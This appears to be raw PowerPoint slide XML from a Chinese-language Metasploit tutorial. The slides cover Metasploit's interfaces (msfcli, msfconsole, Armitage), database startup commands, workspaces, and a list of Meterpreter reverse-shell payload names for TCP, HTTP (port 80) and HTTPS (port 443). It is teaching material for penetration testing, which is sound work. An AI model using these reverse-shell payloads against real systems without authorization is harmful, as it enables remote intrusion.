            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>反向连接，常用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>reverse_http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端口反向连接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>reverse_https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>443</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端口反向连接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="961238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矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D3A47E7-D64A-30CF-C01F-5CA7F9C56EEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9520" y="981556"/>
            <a:ext cx="12196761" cy="46014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21B6BB"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="25400" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="BA0000"/>
                </a:solidFill>
                <a:bevel/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="121900" tIns="60949" rIns="121900" bIns="60949" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1218590" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2399">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1149DD37-3B8C-E2F0-B3BD-EB10880D39AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276727" y="1329760"/>
            <a:ext cx="10193338" cy="717550"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>用户界面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11269" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB58E4D-0113-04BB-BB6F-8D1E035A839E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="902048" y="2396475"/>
            <a:ext cx="5102145" cy="429367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3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Msfcli</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Armitage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5A5A5A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6"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8606" y="2349500"/>
            <a:ext cx="5409473" cy="326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8931814"/>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矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{563DC227-11C0-CA9D-6F27-025FDB73CC73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9520" y="981556"/>
            <a:ext cx="12196761" cy="46014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21B6BB"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="25400" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="BA0000"/>
                </a:solidFill>
                <a:bevel/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="121900" tIns="60949" rIns="121900" bIns="60949" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1218590" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2399">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12292" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{139F5993-47DE-952F-B7E2-2209900A9D4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="417973" y="1742971"/>
            <a:ext cx="10193338" cy="717550"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>启动</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12293" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56038EC4-8173-CE76-F03D-4168B89B6A37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="417973" y="2779390"/>
            <a:ext cx="10147300" cy="293072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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> start     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msfdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mestasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mfsconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>查看是否链接成功：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>db_status</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5A5A5A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5A5A5A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1130FDC6-C722-04BE-0759-C171E4F79BD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="667011" y="5553278"/>
            <a:ext cx="9898262" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可以直接在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>里面调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>等等这样的简单的工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2146284786"/>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F4772732-B43D-40DA-6434-7279D4ED78AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="628708" y="1267181"/>
            <a:ext cx="10193338" cy="7175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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>工作区</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>workspace</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB341C48-2CC4-A839-54D0-FB1EF24F0F13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6466624" y="1425540"/>
            <a:ext cx="5196873" cy="5059206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
